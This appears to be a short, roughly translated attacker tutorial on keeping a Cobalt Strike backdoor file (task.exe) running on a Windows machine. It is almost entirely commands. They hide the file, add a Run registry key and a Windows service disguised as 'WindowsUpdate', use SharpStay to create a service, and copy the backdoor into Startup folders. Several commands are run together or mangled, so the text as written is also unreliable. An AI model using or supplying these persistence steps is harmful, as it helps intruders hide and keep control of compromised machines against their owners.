Title: cobaltstrike permissions maintained

1. Note on registry startup: This method is used to maintain permissions in this way to maintain task.exe is a backdoor file generated by CS. Here, the backdoor file can be used to avoid killing hidden files. Shell attrib C:\Windows\task.exe +s +h Registry startup backdoor file shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d 'C:\Windows\task.exe' /f

2. The windows service automatically starts the hidden file shell attrib C:\Windows\task.exe +s +h service automatically starts the execution backdoor file shell sc create 'WindowsUpdate' binpath='cmd /c start C:\Windows\task.exe'shell sc config 'WindowsUpdate' start=autoshell net start 'WindowsUpdate' or 3.SharpStay.exe automation task starts SharpStay.exe action=CreateService servicename=Debug command='C:\Windows\task.exe'

4. Automatically start the service directory (win7 system is only valid) shell copy 'C:\Windows\task.exe' 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe' /y or copy 'C:\Windows\task.exe' '%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe' /yshell attrib 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe' +s +h